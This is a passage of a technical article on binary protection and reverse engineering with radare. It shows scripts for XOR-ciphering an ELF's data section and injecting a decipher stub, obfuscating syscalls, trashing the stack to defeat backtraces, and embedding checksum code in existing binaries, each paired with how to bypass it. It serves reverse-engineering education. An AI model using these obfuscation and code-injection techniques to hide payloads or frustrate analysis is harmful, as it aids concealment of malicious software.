+  $ cat scripts/fix-shoff.rs
+  ; radare script to fix elf.shoff
+  (fix-shoff
+    s 0            ; seek to offset 0
+    s/ .text       ; seek to first occurrence of ".text" string
+   loop:
+    s/x 00         ; go next word in array of strings
+    ? [1:$$+1]     ; check if this is the last one
+    ?!.loop:       ; loop if buf[1] is == 0
+    s +4-$$%4      ; align seek pointer to 4
+    f nsht         ; store current seek as 'nsht'
+    wv nsht @ 0x20 ; write the new section header table at 0x20 (elf.sh_off)
+  )
+
+The script is used in this way:
+
+  $ echo ".(fix-shoff) && q" | radare -i scripts/fix-shoff.rs -nw "target-elf"
+
+This script works on any generic bin with a trashed shoff. It will not work
+on binaries with stripped section headers (after 'sstrip' f.ex.)
+
+This is possible because GCC stores the section header table immediately
+after the string table index, and this section is easily identified because
+the .text section name will appear on any standard binary file.
+
+It is not hard to think on different ways to bypass this patch. By just
+stripping all the rest of section after setting shoff to 0 will work pretty
+well and the reverser will have to regenerate the section headers
+completely.  This can be done by using sstrip(1) (double 's' is not a typo)
+from the elf-kickers package. This way we eliminate all unnecessary
+sections to run the program.
+
+The nice thing of this header bug is that the e_shoff value is directly
+passed to lseek(2) as second argument, and we can either try with values
+like 0 or -1 to get different errors instead of just giving an invalid
+address. This way it is possible to bypass wrong ELF parsers in other ways.
+
+Similar bugs are found in MACH-O parsers from GNU software like setting
+number of sections to -1 in the SEGMENT_COMMAND header. These kind of bugs
+don't hit kernels because they usually use minimum input from the program
+headers to map it in memory, and the dynamic linker at user space do the
+rest. But debuggers and file analyzers usually fail when try to extract
+corrupted information from headers.
+
+
+--[ 3.2 - Source level watermarks
+
+If we have the source of the target application there will be more ways to
+play with it. For instance, using defines as volatile asm inline macros,
+the developer can add marks or paddings usable for the binary packer.
+
+Some commercial packers offer an SDK which is nothing more than a set of
+include files offering helper functions and watermarks to make the packers
+life easier. And giving to the developer more tools to protect their code.
+
+  $ cat watermark.h
+  #define WATERMARK __asm__ __volatile__ (".byte 3,1,3,3,7,3,1,3,3,7");
+
+We will use this CPP macro to watermark the generated binary for later
+post-processing with radare. We can specify multiple different watermarks
+for various purposes. We must be sure that these watermarks are not already
+in the generated binary.
+
+We can even have larger watermarks to pad our program with noisy bytes in
+the .text section, so we can later replace these watermarks with our
+assembly snippets.
+
+Radare can ease the manual process of finding the watermarks and injecting
+code, by using the following command. It will generate a file named
+'water.list' containing one offset per line.
+
+  [0x00000000]> /x 03010303070301030307
+  [0x00000000]> f~hit[0] > water.list
+  [0x00000000]> !!cat water.list
+  0x102
+  0x13c
+  0x1a2
+  0x219
+
+If we want to run a command at every offset specified in the file:
+
+  [0x00000000]> .(fill-water-marks) @@. water.list
+
+Inside every fill-water-mark macro we can analyze the watermark type
+depending on the 'hit' flag number (we can search more than one keyword at
+a time) or by checking the bytes there and perform the proper action.
+
+If those watermarks have a fixed size (or the size is embedded into the
+watermark) we can then write a radare script that write a branch
+instruction at to skip the padding. (This will avoid program crash because
+it will not execute the dummy bytes of our watermark).
+
+Here's an ascii-art explanation:
+
+ |<-- watermark ------------------------------------------>|
+               |<-- unused bytes                        -->|
+ +---------------------------------------------------------+
+ | jmp $$+size | .. .. .. .. .. .. .. .. .. .. .. .. .. .. | program
+ +---------------------------------------------------------+
+      |                                                      ^
+      `------------------------------------------------------'
+
+At this point we have some more controlled holes to put our code.
+
+Our variable-sized watermark will be defined in this way:
+
+  .long 0,1,2,3,4,5,6,7,4*20,9,10,11,12,13,14,15,16,17,18,19,20
+
+And the watermark filling macro:
+
+  (fill-water-marks,wa jmp $${io.vaddr}+$$+[$$+8],)
+
+  # run the macro to patch the watermarks with jumps
+  .(fill-water-marks) @@. water.list
+
+The io.vaddr specified the virtual base address of the program in memory.
+
+
+--[ 3.3 - Ciphering .data section
+
+A really common protection in binaries consists on ciphering the data
+section of a program to hide the strings and make the static code analysis
+harder.
+
+The technique presented here aims to protect the data section. This section
+generally does not contain program strings (because they are usually
+statically defined in the rodata section), but will help to understand some
+characteristics of the ELF loader and how programs work with the rw
+sections.
+
+The PT_LOAD program header type specifies where, which and how part of the
+binary should be mapped in memory. By default, the kernel maps the program
+at a base address. More over it will map aligned size (asize) of the
+program starting at 'physical' on 'virtual' address with 'flags'
+permissions.
+
+  $ rabin -I /bin/ls | grep baddr
+  baddr=0x08048000
+
+  $ rabin -H /bin/ls | grep LOAD
+  virtual=0x08060000 physical=0x00018000 asize=0x1000 size=0x0fe0 \
+  flags=0x06 type=LOAD name=phdr_0
+
+In this case, 4K is the aligned size of 0xfe0 bytes of the binary will be
+loaded at address 0x8060000 starting at address 0x18000 of the file.
+
+By running '.!rabin -rIH $FILE' from radare all this information will be
+imported into radare and it will emulate such situation.
+
+The problem we face here, is that the size and address of the mapped area
+doesn't match with the offset of the .data section.
+
+Some operations are required to get the correct offsets to statically
+modify the program to cipher such range of bytes and inject a snippet
+of assembly to dynamically decipher such bytes.
+
+The script looks like:
+
+-------8<------------
+# flag from virtual address (the base address where the binary is mapped)
+# this will make all new flags be created at current seek + <addr>
+# we need to do this because we are calculating virtual addresses.
+ff $${io.vaddr}
+
+# Display the ranges of the .data section
+?e Data section ranges : `?v section._data`- `?v section._data_end`
+
+# set flag space to 'segments'. This way 'f' command will only display the
+# flags contained in this namespace.
+fs segments
+
+# Create flags for 'virtual from' and 'virtual to' addresses.
+# We grep for the first row '#0' and the first word '[0]' to retrieve
+# the offset where the PT_LOAD segment is loaded in memory
+f vfrom @ `f~vaddr[0]#0`
+
+# 'virtual to' flag points to vfrom+ptload segment size
+f vto @ vfrom+`f~vaddr[1]#0`
+
+# Display this information
+?e Range of data decipher : `?v vfrom`- `?v vto`= `?v vto-vfrom`bytes
+
+# Create two flags to store the position of the physical address of the
+# PT_LOAD segment.
+f pfrom @ `f~paddr[0]#0`
+f pto @ pfrom+`f~paddr[1]#0`
+
+# Adjust deltas against data section
+# ----------------------------------
+# pdelta flag is not an address, we set flag from to 0
+# pdelta = (address of .data section)-(physical address of PTLOAD segment)
+ff 0 && f pdelta @ section._data-pfrom
+?e Delta is `?v pdelta`
+
+# reset flag from again, we are calculating virtual and physical addresses
+ff $${io.vaddr}
+f pfrom @ pfrom+pdelta
+f vfrom @ vfrom+pdelta
+ff 0
+
+?e Range of data to cipher: `?v pfrom`- `?v pto`= `?v pto-pfrom`bytes
+
+# Calculate the new physical size of bytes to be ciphered.
+# we dont want to overwrite bytes not related to the data section
+f psize @ section._data_end - section._data
+?e PSIZE = `?v psize`
+
+# 'wox' stands for 'write operation xor' which accepts an hexpair list as
+# a cyclic XOR key to be applied to at 'pfrom' for 'psize' bytes.
+wox a8 @ pfrom:psize
+
+# Inject shellcode
+#------------------
+
+# Setup the simple profile for the disassembler to simplify the parsing
+# of the code with the internal grep
+e asm.profile=simple
+
+# Seek at entrypoint
+s entrypoint
+
+# Seek at address (fourth word '[3]') at line'#1' line of the disassembly
+# matching the string 'push dword' which stands for the '__libc_csu_init'
+# symbol. This is the constructor of the program, and we can modify it
+# without many consequences for the target program (it is not widely used).
+s `pd 20~push dword[3]#1`
+
+# Compile the 'uxor.S' specifying the virtual from and virtual to addresses
+!gcc uxor.S -DFROM=`?v vfrom` -DTO=`?v vfrom+psize`
+
+# Extract the symbol 'main' of the previously compiled program and write it
+# in current seek (libc_csu_init)
+wx `!!rabin -o d/s a.out|grep ^main|cut -d ' ' -f 2`
+
+# Cleanup!
+?e Uncipher code: `?v $$+$${io.vaddr}`
+!!rm -f a.out
+q!
+-------8<------------
+
+The unciphering snippet of code looks like:
+
+-------8<------------
+.global main
+main:
+  mov $FROM, %esi
+  mov $TO, %edi
+  0:
+  inc %esi
+  xorb $0xa8, 0(%esi)
+  cmp %edi, %esi
+  jbe 0b
+  xor %edi, %edi
+  ret
+-------8<------------
+
+Finally we run the code:
+
+  $ cat hello.c 
+  #include <stdio.h>
+  char message[128] = "Hello World";
+  
+  int main()
+  {
+    message[1]='a';
+    if (message[0]!='H')
+      printf("Oops\n");
+    else
+      printf("%s\n", message);
+    return 0;
+  }
+  
+  $ gcc hello.c -o hello
+  $ strings hello | grep Hello
+  Hello World
+  $ ./hello
+  Hallo World
+  $ radare -w -i xordata.rs hello
+  $ strings hello | grep Hello
+  $ ./hello
+  Hallo World
+
+The 'Hello World' string is no longer in plain text. The ciphering
+algorithm is really stupid. The reconstructed data section can be
+extracted from a running process using the debugger:
+
+  $ cat unpack-xordata.rs
+  e asm.profile=simple
+  s entrypoint
+  !cont `pd 20~push dword[3]#2`
+  f delta @ section._data- segment.phdr_0.rw_.paddr-section.
+  s segment.phdr_0.rw_.vaddr+delta
+  b section._data_end - section._data
+  wt dump
+  q!
+  $ radare -i unpack-xordata.rs -d ./hello
+  $ strings dump 
+  Hello World
+
+Or statically:
+
+  e asm.profile=simple
+  wa ret @ `pd 20~push dword[3]#1`
+  wox a8 @ section._data:section._data_end-section.data
+
+This is a plain example of how complicated can be to add a protection and
+how easy is to bypass it.
+
+As a final touch for the unpacker, just write a 'ret' instruction at symbol
+'__libc_csu_init' where the deciphering loop lives:
+
+  wa ret @ sym.__libc_csu_init
+
+Or just push a null pointer instead of the csu_init pointer in the entrypoint.
+
+  e asm.profile=simple
+  s entrypoint
+  wa push 0 @ `pd 20~push dword[0]#1`
+
+
+--[ 3.4 - Finding differences in binaries
+
+Lets draw a scenario where a modified binary (detected by a checksum file
+analyzer) has been found on a server, and the administrator or the forensic
+analyst wants to understand whats going on that file.
+
+To simplify the explanation the explanation will be based on the previous
+chapter example.
+
+At first point, checksum analysis will determine if there's any collision
+in the checksum algorithm, and if the files are really different:
+
+  $ rahash -a all hello
+  par:     0
+  xor:     00
+  hamdist: 01
+  xorpair: 2121
+  entropy: 4.46
+  mod255:  84
+  crc16:   2654
+  crc32:   a8a3f265
+  md4:     cbfc07c65d377596dd27e64e0dcac6cd
+  md5:     2b3b691d92e34ad04b1affea0ad2e5ab
+  sha1:    8ac3f9165456e3ac1219745031426f54c6997781
+  sha256:  749e6a1b06d0cf56f178181c608fc6bbd7452e361b1e8bfbcfac1310662d4775
+  sha384:  c00abb14d483d25d552c3f881334ba60d77559ef2cb01ff0739121a178b05...
+  sha512:  099b42a52b106efea0dc73791a12209854bc02474d312e6d3c3ebf2c272ac...
+
+  $ rahash -a all hello.orig 
+  par:     0
+  xor:     de
+  hamdist: 01
+  xorpair: a876
+  entropy: 4.29
+  mod255:  7b
+  crc16:   2f1f
+  crc32:   b8f63e24
+  md4:     bc9907d433d9b6de7c66730a09eed6f4
+  md5:     6085b754b02ec0fc371a0bb7f3d2f34e
+  sha1:    6b0d34489c5ad9f3443aadfaf7d8afca6d3eb101
+  sha256:  8d58d685cf3c2f55030e06e3a00b011c7177869058a1dcd063ad1e0312fa1de1
+  sha384:  6e23826cc1ee9f2a3e5f650dde52c5da44dc395268152fd5c98694ec9afa0...
+  sha512:  09b7394c1e03decde83327fdfd678de97696901e6880e779c640ae6b4f3bf...
+
+There is the possibility to generate two different files matching until 3
+different checksum algorithms (and maybe more in the future). If any of
+them differs we can determine that the file is different.
+
+$ du -bs hello hello.orig 
+4913    hello
+4913    hello.orig
+
+As both files have the same size it will be worth using a byte-level
+diffing, because it is more probable easy to read the differences than
+trying to understand them as deltified ones (which is the default diffing
+algorithm).
+
+  $ radiff -b hello.orig hello
+  ------
+  000003ed 00
+  000003f0 55   |   60 
+  000003f1 89   |   be 
+  000003f2 e5   |   c0 
+  ...
+  00000406 fe   |   61 
+  00000407 ff   |   c3 
+  00000408 ff   |   90 
+  00000409 8d   |   90 
+  0000040a bb   |   90 
+  0000040b 18   |   90 
+  0000040c ff
+  ------
+  000005bd 00
+  000005c0 00   |   a8 
+  000005c1 00   |   a8 
+  000005c2 00   |   a8 
+  ...
+  000005df 00   |   a8 
+  000005e0 48   |   e0 
+  000005e1 65   |   cd 
+  000005e2 6c   |   c4 
+  000005e3 6c   |   c4 
+  000005e4 6f   |   c7 
+  0000065f 00   |   a8 
+  00000660 00
+
+Radiff detects two blocks of changes determined by the '------' lines.
+
+The first block starts at 0x3f0 and the second one (which is bigger) begins
+at address 0x5c0.
+
+While watching the massive 00->a8 conversion it is possible to blindly
+determine that the ciphering algorithm is XOR and the key is 0xa8. But
+let's get a look on the first block of changes and disassemble the code.
+
+  $ BYTES=$(radiff -f 0x3f0 -t 0x40b -b hello.orig hello | awk '{print $4}')
+  $ rasm -d "$(echo ${BYTES})"
+  pushad 
+  mov esi, 0x80495c0
+  mov edi, 0x8049660
+  inc esi
+  xor byte [esi], 0xa8
+  cmp esi, edi
+  jbe 0x38
+  popad 
+  ret 
+  ...
+
+Here it is! this code of assembler is looping from 0x80495c0 to 0x8049660
+and XORing each byte with 0xa8.
+
+radiff can also dump the results of the diff in radare commands. The
+execution of the script will result on a binary patch script to convert one
+file to another.
+
+  $ radiff -rb hello hello.orig > binpatch.rs
+  $ cat binpatch.rs | radare -w hello
+  $ md5sum hello hello.orig
+  6085b754b02ec0fc371a0bb7f3d2f34e  hello
+  6085b754b02ec0fc371a0bb7f3d2f34e  hello.orig
+
+
+--[ 3.5 - Removing library dependencies
+
+In some gnu/linux distributions, all the ELF binaries are linked against
+libselinux, which is an undesired dependency if we want to make our hello
+world portable. SElinux is not available in all gnu/linux distros.
+
+This is a simple example, but we can extend the issue to bad pkg-config
+configuration files that can make a binary depend on more libraries than
+the minimum required.
+
+Perhaps most users will not care and will probably install those
+dependencies, recompile the kernel or whatever else. It is a pity to make
+steps in backward instead of telling gcc to not link against those
+libraries.
+
+But we can avoid these dependencies easily: all the library names are
+stored as zero-terminated strings in the ELF header, and the loader (at
+least the Solaris, Linux and BSD ones) will ignore dependency entries if
+the library name is zero length.
+
+The patch consists on finding the non-desired library name (or the prefix,
+if there are more than one libraries with similar names) and then write
+0x00 in each search result.
+
+  $ radare -nw hello
+  [0x00000000]> / libselinux
+  ... (results) ...
+  [0x00000000]> wx 00 @@ hit
+  [0x00000000]> q!
+
+Using -nw radare will run without interpreting the ~/.radarerc and it will
+not detect symbols or analyze code (we only need to use the basic
+hexadecimal capabilities). The -w flag will open the file in read-write.
+
+Each search result will be stored in the 'search' flagspace with names
+predefined by the 'search.flagname' eval variable that will be hit%d_%d by
+default. (This is keyword_index and hit_index).
+
+The last command will run 'wx 00' at every '@@' flag matching 'hit' in the
+current flagspace.
+
+Use 'q!' if you don't want to be prompted to restore the changes done
+before exiting.
+
+
+--[ 3.6 - Syscall obfuscation
+
+Looking for raw int 0x80 instructions on standard binaries it's going
+probably to be a hard task unless these are statically compiled. This is
+because they usually live in libraries which are embedded in the program.
+
+Libraries like libc have loads of symbols that are directly mapped to
+syscalls, and the reverser could use this information to identify code in a
+statically compiled program.
+
+To obfuscate symbols we can embed syscalls directly on the host program,
+after trashing the stack to break standard backtraces.
+
+If you go deep enough on the new syscalling system of Linux you will notice
+that the int 0x80 syscall mechanism is no longer used in the current x86
+platforms because performance reasons.
+
+The new syscall mechanism consists in calling a trampoline function
+installed by the kernel as a 'fake' ELF shared object mapped on the running
+process memory. This trampoline function implements the most suitable
+syscall mechanism for the current platform. This shared object is called
+VDSO.
+
+In Linux only two segment registers are used: cs and gs. This is for
+simplicity reasons. The first one allows to access to the whole program
+memory maps, and the second one is used to store Thread related
+information.
+
+Here is a simple segment dumper to get the contents from %gs.
+
+----------------------8<----------------------------
+$ cat segdump.S
+#define FROM 0 /* 0x8048000 */
+#define LEN 0x940
+#define TIMES 1
+#define SEGMENT %gs /* %ds */
+
+.global main
+
+.data
+buffer:
+.fill LEN, TIMES, 0x00
+
+.text
+main:
+	mov $TIMES, %ecx
+  loopme:
+	push %ecx
+
+	sub $TIMES, %ecx
+	movl $LEN, %eax
+	imul %eax, %ecx
+	movl %ecx, %esi /* esi = ($TIMES-%ecx)*$LEN */
+	addl $FROM, %esi
+	lea buffer, %edi
+	movl $LEN, %ecx
+
+	rep movsb SEGMENT:(%esi),%es:(%edi)
+	
+	movl $4, %eax
+	movl $1, %ebx
+	lea buffer, %ecx
+	movl $LEN, %edx
+	int $0x80
+
+	pop %ecx
+	xor %eax, %eax
+	cmp %eax, %ecx
+	dec %ecx
+	jnz loopme
+
+	ret
+----------------------8<----------------------------
+
+At this point we disable the random va space to analyze the contents of the
+VDSO map always at the same address during executions.
+
+  $ sudo sysctl -w kernel.randomize_va_space=0
+
+Compile and dump the segment to a file:
+
+  $ gcc segdump.S
+  $ ./a.out > gs.segment
+
+And now let's do some little analysis in the debugger:
+
+  $ radare -d ls  ; debug 'ls' program
+  ...
+  ; Inside the debugger we write the contents of the gs.segment file.
+  ; In the initial state, the current seek points to 'eip'.
+
+  [0x4A13B8C0]> wf gs.segment
+  Poke 100 bytes from gs.segment 1 times? (y/N) y
+  file poked.
+     offset    0 1  2 3  4 5  6 7  8 9  A B  C D  E F 0123456789ABCDEF
+  0x4a13b8c0, c006 e8b7 580b e8b7 c006 e8b7 0000 0000 ....X...........
+  0x4a13b8d0, 1414 feb7 ec06 0a93 b305 6beb 0000 0000 ..........k.....
+  0x4a13b8e0, 0000 0000 0000 0000 0000 0000 0000 0000 ................
+  0x4a13b8f0, 0000 0000 0000 0000 0000 0000 0000 0000 ................
+  0x4a13b900, 0000 0000 0000 0000 0000 0000 0000 0000 ................
+  0x4a13b910, 0000 0000 0000 0000 0000 0000 0000 0000 ................
+
+  ; Once the file is poked in process memory we have different ways to
+  ; analyze the contents of the current data block. One possible option
+  ; is to use the 'pm' command which prints memory contents following the
+  ; format string we use as argument, it is also possible to specify the
+  ; element names as in a structure.
+  ; 
+  ; Another option is the 'ad' command which 'analyzes data' reading the
+  ; memory as 32bit primitives following pointers and identifying
+  ; references to code, data, strings or null pointers.
+
+  [0x4A13B8C0]> pm XXXXXXXXX
+  0x4a13b8c0 = 0xb7fe46c0 
+  0x4a13b8c4 = 0xb7fe4ac8 
+  0x4a13b8c8 = 0xb7fe46c0 
+  0x4a13b8cc = 0x00000000 ; eax
+  0x4a13b8d0 = 0xb7fff400 ; maps._vdso__0+0x400
+  0x4a13b8d4 = 0xff0a0000 
+  0x4a13b8d8 = 0x856003b1 
+  0x4a13b8dc = 0x00000000 ; eax
+  0x4a13b8e0 = 0x00000000 ; eax
+
+  [0x4A13B8C0]> ad
+  0x4a13b8c0, int be=0xc046feb7 le=0xb7fe46c0 
+  0x4a13b8c4, int be=0xc84afeb7 le=0xb7fe4ac8 
+  0x4a13b8c8, int be=0xc046feb7 le=0xb7fe46c0 
+     0x4a13b8cc, (NULL)
+  0x4a13b8d0, int be=0x00f4ffb7 le=0xb7fff400 maps._vdso__0+0x400
+  0xb7fff400,    string "QRU"
+  0xb7fff404, int be=0xe50f3490 le=0x90340fe5 
+
+  ; Both analysis result in a pointer to the vdso map at 0x4a13b8d0
+  ; Disassembling these contents with 'pd' (print disassembly) we get that
+  ; the code uses sysenter.
+
+  [0x4A13B8C0]> pd 17 @ [+0x10]
+          _vdso__0:0xb7fff400,   51              push ecx
+          _vdso__0:0xb7fff401    52              push edx
+          _vdso__0:0xb7fff402    55              push ebp
+      .-> _vdso__0:0xb7fff403    89e5            mov ebp, esp
+      |   _vdso__0:0xb7fff405    0f34            sysenter 
+      |   _vdso__0:0xb7fff407    90              nop 
+      |   _vdso__0:0xb7fff408,   90              nop 
+      |   _vdso__0:0xb7fff409    90              nop 
+      |   _vdso__0:0xb7fff40a    90              nop 
+      |   _vdso__0:0xb7fff40b    90              nop 
+      |   _vdso__0:0xb7fff40c,   90              nop 
+      |   _vdso__0:0xb7fff40d    90              nop 
+      `=< _vdso__0:0xb7fff40e    ebf3            jmp 0xb7fff403
+          _vdso__0:0xb7fff410,   5d              pop ebp
+          _vdso__0:0xb7fff411    5a              pop edx
+          _vdso__0:0xb7fff412    59              pop ecx
+          _vdso__0:0xb7fff413    c3              ret 
+
+After this little analysis we can use a new way to call syscalls and
+transform the "int 0x80" instructions into a bunch of operations.
+
+  new_syscall:
+    push %edi
+    push %esi
+    movl $0x10, %esi
+    movl %gs:(%esi), %edi
+    call *%edi
+    pop %esi
+    pop %edi
+    ret
+
+Using this 'big' primitive we are able to add more trash code and make
+static analysis harder.
+
+Using dynamic analysis it is possible to bypass this protection by writing
+a simple script that dumps the backtrace every time a syscall is executed.
+
+  (syscall-bt
+    e scr.tee=log.txt
+    label:
+    !contsc
+    !bt
+    .label:
+  )
+
+Or with a shell single liner:
+
+  $ echo '(syscall-bt,e scr.tee=log.txt,label:,!contsc,!bt,.label:,) \
+    &&.(syscall-bt)' | radare -d ./a.out
+
+A way to make the analysis harder is to trash the stack contents with a
+random offset every time we run a syscall. By decreasing the stack pointer
+and later incrementing it we will make the backtrace fail.
+
+To trash the stack we can just increment the stack before the syscall and
+decrement it after calling it. The analyst will have to patch these inc/dec
+opcodes for every syscall trampolines to get proper backtrace and resolve
+the xrefs for each entry.
+
+Radare implements a "!contsc" command that makes the debugger stop before
+and after a syscall. This can be scripted together with "!bt" and "!st" to
+get a handmade version of the strace utility.
+
+Another trick that we can exploit for writing our homebrew packer is to use
+instructions needed to be patched for proper analysis as cipher keys.
+Making the program crash when trying to decipher a section using invalid
+keys for example.
+
+
+--[ 3.7 - Replacing library symbols
+
+Statically linked binaries are full of unused bytes, we can take use of
+this to inject our code.
+
+Lot of library symbols (for example from libc) can be directly replaced by
+system calls at the symbol or directly in-place where it is called. For
+example:
+
+  call exit
+
+can be replaced these (also 5 byte length) instructions:
+
+  xor eax,eax
+  inc eax
+  int 0x80
+
+  $ rasm 'xor eax,eax;inc eax;int 0x80'
+  31 c0 40 cd 80 
+
+This way we can just go into the statified libc's exit implementation and
+overwrite it with our own code.
+
+If the binary is statically compiled with stripped symbols we will have to
+look for signatures or directly find the 'int 0x80' instruction and then
+analyze code backward looking for the beginning of the implementation and
+then find for xrefs to this point.
+
+Most compilers append libraries at the end of the binary, so we can easily
+'draw' an imaginary line where the program ends and libraries start.
+
+There's another tool that may help to identify which libraries and versions
+are embedded in our target program. It is called 'rsc gokolu'. The name
+stands for 'g**gle kode lurker' and it will look for strings in the given
+program in the famous online code browser and give approximated results of
+the source of the string.
+
+When we have debugging or symbolic information the process becomes much
+easier and we can directly overwrite the first bytes of the embedded glibc
+code with the small implementation in raw assembly using syscalls.
+
+rabin is the utility in radare which extracts information from the headers
+of a given program. This is like a multi-architecture multi-platform and
+multi-format 'readelf' or 'nm' replacement which supports ELF32/64,
+PE32/32+, CLASS and MACH0. 
+
+The use of this tool is quite simple and the output is quite clean to ease
+the parsing with sed and other shell tools.
+
+  $ rabin -vi a.out
+  [Imports]
+  Memory address	File offset	Name
+  0x08049034	0x00001034	__gmpz_mul_ui
+  0x08049044	0x00001044	__cxa_atexit
+  0x08049054	0x00001054	memcmp
+  0x08049064	0x00001064	pcap_close
+  0x08049074	0x00001074	__gmpz_set_ui
+  ...
+
+  $ rabin -ve a.out
+  [Entrypoint]
+  Memory address:	0x080494d0
+
+  $ rabin -vs a.out
+  [Symbols]
+  Memory address	File offset	Name
+  0x0804d86c	0x0000586c	__CTOR_LIST__
+  0x0804d874	0x00005874	__DTOR_LIST__
+  0x0804d87c	0x0000587c	__JCR_LIST__
+  0x08049500	0x00001500	__do_global_dtors_aux
+  0x0804dae8	0x00005ae8	completed.5703
+  0x0804daec	0x00005aec	dtor_idx.5705
+  0x08049560	0x00001560	frame_dummy
+  ...
+
+  $ rabin -h
+  rabin [options] [bin-file]
+   -e        shows entrypoints one per line
+   -i        imports (symbols imported from libraries)
+   -s        symbols (exports)
+   -c        header checksum
+   -S        show sections
+   -l        linked libraries
+   -H        header information
+   -L [lib]  dlopen library and show address
+   -z        search for strings in elf non-executable sections
+   -x        show xrefs of symbols (-s/-i/-z required)
+   -I        show binary info
+   -r        output in radare commands
+   -o [str]  operation action (str=help for help)
+   -v        be verbose
+
+ See manpage for more information.
+
+The same flags can be used for any type of binary for any architecture.
+
+Using the -r flag the output will be formatted in radare commands, this way
+you can import the binary information. This command imports the symbols,
+sections, imports and binary information.
+
+  [0x00000000]> .!!rabin -rsSziI $FILE
+
+This is done automatically when loading a file if you have file.id=true, if
+you want to disable the analysis run 'radare' with '-n' (because this way
+it will not interpret the ~/.radarerc).
+
+Programs with symbols or debug information are mostly analyzed by the code
+analysis of 'radare' thanks to the hints given by 'rabin'. So,
+theoretically we will be able to automatically resolve the crossed
+references to functions. But if we are not that lucky we can just setup a
+simple disassembly output format (e asm.profile=simple) and disassemble the
+whole program code grepping for 'call 0x???????' to resolve calls to our
+desired owned symbol.
+
+  [0x08049A00]> e scr.color=false
+  [0x08049A00]> e asm.profile=simple
+  [0x08049A00]> s section._text
+  [0x08049A00]> b section._text_end-section._text
+  [0x08049A00]> pd~call 0x80499e4
+  0x08049fd9    call 0x80499e4  ; imp.exit
+  0x0804fa89    call 0x80499e4  ; imp.exit
+  0x0805047b    call 0x80499e4  ; imp.exit
+  [0x08049A00]> 
+
+If we are not lucky and do not have symbols we will have to identify which
+parts of the binary are part of our target binary.
+
+  $ rsc syms-dump /lib/libc.so.6 24 > symbols
+
+
+--[ 3.8 - Checksumming
+
+The most common procedure to check for undesired runtime or static program
+patches is done by using checksumming operations over sections, functions,
+code or data blocks.
+
+These kind of protections are usually easy to patch, but allow the end user
+to get a grateful error message instead of a raw Segmentation Fault.
+
+The error message string can be a simple entrypoint for the reverser to
+catch the position of the checksumming code.
+
+Radare offers a hashing command under the "h" char and allows you to
+calculate block-based checksums while debugging or statically by opening
+the file from disk.
+
+Heres an usage example:
+
+  hmd5
+
+It is also possible to use these hashing instructions to find pieces of the
+program matching a certain checksum value, or just recalculate the new sum
+to not patch the hash check.
+
+The 'h' command can be also performed from the shell by using the "rahash"
+program which permits to calculate multiple checksums for a single file
+based on blocks of bytes. This is commonly used on forensics, when you want
+a checksum to not only give you a boolean reply (if the program has been
+modified), because this way you can reduce the problem on a smaller piece
+of the binary because you have multiple checksums at different offsets for
+the same file.
+
+This action can be done over hard disks, device firmwares or memory dumps
+of the same size.
+
+If you are dealing similar file with deltified contents or you require a
+more fine grained result you should try "radiff" which implements multiple
+bindiffing algorithms that goes from byte level detecting deltas to code
+level diffing using information of basic blocks, variables accessed and
+functions called.
+
+We will also have to decide a protection method for the checksumming
+algorithm, because this will be the first patch required to enable software
+breakpoints and user defined patches to be done.
+
+To protect the hasher we just put it distributed along the program by
+mixing its code with the rest of the program making more difficult to
+identify the its position. We can also choose to put this code into a
+ciphered area in .data together with other necessary code to make the
+program run.
+
+One of the main headaches for reversers is the layering of protections that
+can be represented by lot of entrypoints to the same code making more
+difficult to locate and patch in a proper way.
+
+The checksumming of a section can be used as a deciphering key for other
+ciphered sections, to avoid easy patching, the program should check for the
+consistence of the deciphered code. This can be done by checking for
+another checksum or by comparing few bytes at the beginning of the
+deciphered and mmap code.
+
+There is another possible design to implement the checksumming algorithm in
+a more flexible way which consists on checksumming the code in runtime
+instead of hardcoding the resulting value somewhere.
+
+This method allows us to 'protect' multiple functions without having to
+statically calculate the checksum value of the region. The problem with
+this method is that it doesn't provide us protection against static
+modifications on the binary.
+
+This snippet can be compiled with DEBUG=0 to get a fully working
+checksumming function which returns 0 when the checksum matches.
+
+---------------------8<--------------------------
+#define CKSUM 0x68
+#define FROM 0x8048000
+#define SIZE 1024
+
+str:
+.asciz "Checksum: 0x%08x\n"
+
+.global cksum
+cksum:
+	pusha
+	movl $FROM, %esi
+	movl $SIZE, %ecx
+	xor %eax, %eax
+	1:
+	xorb 0(%esi), %al
+	add $1, %esi
+	loopnz 1b
+#if DEBUG
+	pushl %eax
+	pushl $str
+	call printf
+	addl $8, %esp
+#else
+	sub $CKSUM, %eax
+	jnz 2f
+#endif
+	popa
+	ret
+
+#if DEBUG
+.global main
+main:
+	call cksum;
+	ret
+#else
+	2:
+	mov $20, %eax
+	int $0x80
+	mov $37, %ebx
+	mov $9, %ecx
+	xchg %eax, %ebx
+	int $0x80
+#endif
+---------------------8<--------------------------
+
+To get the bytes of the function to be pushed we can use an 'rsc' script that
+dumps the hexpairs contained managed by a symbol in a binary:
+
+  $ gcc cksum.S -DDEBUG
+  $ ./a.out
+  Checksum: 0x69
+
+  $ gcc -c cksum.S
+  $ rsc syms-dump cksum.o | grep cksum
+  cksum: 60 be 00 80 04 08 b9 00 04 00 00 31 c0 32 06 83 c6 01 e0 f9 2d d2 04 \
+  00 00 75 02 61 c3 b8 14 00 00 00 cd 80 bb 25 00 00 00 b9 09 00 00 00 93 cd 80 
+
+The offsets to patch with our ranged values are:
+
+  +2: original address (4 bytes in little endian)
+  +7: size of buffer (4 bytes in little endian)
+  +21: checksum byte (1 byte)
+
+We can use this hexdump from a radare macro that automatically patches the
+correct bytes while inserting the code in the target program.
+
+  $ rsc syms-dump cksum.o | grep cksum | cut -d : -f 2 > cksum.hex
+  $ cat cksum.macro
+  (cksum-init ckaddr size,f ckaddr @ $0,f cksize @ $1,)
+  (cksum hexfile size
+    # kidnap some 4 opcodes from the function
+    f kidnap @ `aos 4`
+    yt kidnap ckaddr+cksize
+    wa jmp $$+kidnap @ ckaddr+cksize+kidnap
+    wa call `?v ckaddr`
+    wF $0 @ ckaddr
+    f cksize @ $$w
+    f ckaddr_new @ ckaddr+cksize+50
+    wv $$ @ ckaddr+2
+    wv $1 @ ckaddr+7
+    wx `hxor $1` @ ckaddr+21
+    f ckaddr @ ckaddr_new
+  )
+
+  $ cat cksum.hooks
+  0x8048300
+  0x8048400
+  0x8048800
+
+  $ radare -w target
+  [0x8048923]> . cksum.macro
+  [0x8048923]> .(cksum-init 0x8050300 30)
+  [0x8048923]> .(cksum cksum.hex 100) @@. cksum.hooks
+
+
+--[ 4 - Playing with code references
+
+The relationship between parts of code in the program are a good source of
+information for understanding the dependencies between code blocks,
+functions.
+
+Following sub-chapters will explain how to generate, retrieve and use the
+code references for retrieving information from a program in memory or
